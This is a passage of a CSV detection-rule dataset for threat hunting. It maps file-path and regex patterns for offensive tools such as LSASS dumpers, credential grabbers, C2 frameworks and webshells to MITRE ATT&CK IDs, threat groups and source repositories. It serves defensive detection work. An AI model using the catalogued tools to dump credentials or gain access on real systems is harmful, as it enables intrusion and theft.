- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","0","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","16364" "*\logonuifox.dll*",".{0,1000}\\logonuifox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16365" "*\LokiRAT_Relapse.exe*",".{0,1000}\\LokiRAT_Relapse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16372" "*\lolbin.exe*",".{0,1000}\\lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16373" "*\lolMiner.cfg*",".{0,1000}\\lolMiner\.cfg.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16374" "*\lolminer.exe*",".{0,1000}\\lolminer\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16375" "*\lolMinerGUI.cpp*",".{0,1000}\\lolMinerGUI\.cpp.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16376" "*\lolMinerGUI.pdb*",".{0,1000}\\lolMinerGUI\.pdb.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16377" "*\LOLSpoof.nim*",".{0,1000}\\LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16378" "*\LOLSpoof\*",".{0,1000}\\LOLSpoof\\.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16379" "*\Look at this instruction.txt*",".{0,1000}\\Look\sat\sthis\sinstruction\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16380" "*\lookupsid.py*",".{0,1000}\\lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16381" "*\lookup-sid.py*",".{0,1000}\\lookup\-sid\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16382" "*\looneypwner.sh*",".{0,1000}\\looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","16383" "*\LostMyPassword.cfg*",".{0,1000}\\LostMyPassword\.cfg.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - 
T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16384" "*\LostMyPassword_lng.ini",".{0,1000}\\LostMyPassword_lng\.ini","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16385" "*\LostMyPassword32bit*",".{0,1000}\\LostMyPassword32bit.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16386" "*\LPE_Reflect_Elevate.x64.dll*",".{0,1000}\\LPE_Reflect_Elevate\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16387" "*\lsadump.py*",".{0,1000}\\lsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - 
T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","16388" "*\lsadump.py*",".{0,1000}\\lsadump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16389" "*\lsarelayx.cpp*",".{0,1000}\\lsarelayx\.cpp.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16390" "*\lsarelayx.csproj*",".{0,1000}\\lsarelayx\.csproj.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16391" "*\lsarelayx.sln*",".{0,1000}\\lsarelayx\.sln.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16392" 
"*\lsasecrets.py*",".{0,1000}\\lsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","16393" "*\LSASecrets.txt*",".{0,1000}\\LSASecrets\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","16394" "*\lsass.DMP",".{0,1000}\\lsass\.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","16395" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","16396" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","16397" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16398" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - 
T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","16399" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","16400" "*\lsass.rar*",".{0,1000}\\lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16402" "*\lsass.zip*",".{0,1000}\\lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16403" "*\Lsass_Shtinkering.cpp*",".{0,1000}\\Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16404" 
"*\LSASS_Shtinkering.sln*",".{0,1000}\\LSASS_Shtinkering\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16405" "*\LSASS_Shtinkering\*",".{0,1000}\\LSASS_Shtinkering\\.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16406" "*\lsass64.exe*",".{0,1000}\\lsass64\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16407" "*\LSASSProtectionBypass\*",".{0,1000}\\LSASSProtectionBypass\\.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","16408" "*\Lsass-Shtinkering-main*",".{0,1000}\\Lsass\-Shtinkering\-main.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16409" "*\LsassSilentProcessExit*",".{0,1000}\\LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","16410" "*\Lsassx.ps1*",".{0,1000}\\Lsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16411" "*\Lsassx-main*",".{0,1000}\\Lsassx\-main.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16412" "*\Lsassx-OBF.ps1*",".{0,1000}\\Lsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","16413" "*\lsassy_dump.py*",".{0,1000}\\lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16414" "*\lslsass.exe*",".{0,1000}\\lslsass\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16416" "*\luajit.exe*",".{0,1000}\\luajit\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","16418" "*\luna.log*",".{0,1000}\\luna\.log.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16419" "*\Luna-Logged-*.zip*",".{0,1000}\\Luna\-Logged\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16420" "*\LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker.
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","16421" "*\M3 AutoIt Rat *.exe*",".{0,1000}\\M3\sAutoIt\sRat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16422" "*\m365-fatigue.py*",".{0,1000}\\m365\-fatigue\.py.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","16423" "*\m3-gen.py*",".{0,1000}\\m3\-gen\.py.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","16424" "*\MaccaroniC2*",".{0,1000}\\MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous 
client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","16425" "*\MaceTrap.exe*",".{0,1000}\\MaceTrap\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16426" "*\machine_role.py*",".{0,1000}\\machine_role\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16427" "*\MachineAccountQuota.py*",".{0,1000}\\MachineAccountQuota\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16428" "*\Macker's Private PHPShell.php*",".{0,1000}\\Macker\'s\sPrivate\sPHPShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16429" "*\macoffe.pdb*",".{0,1000}\\macoffe\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - 
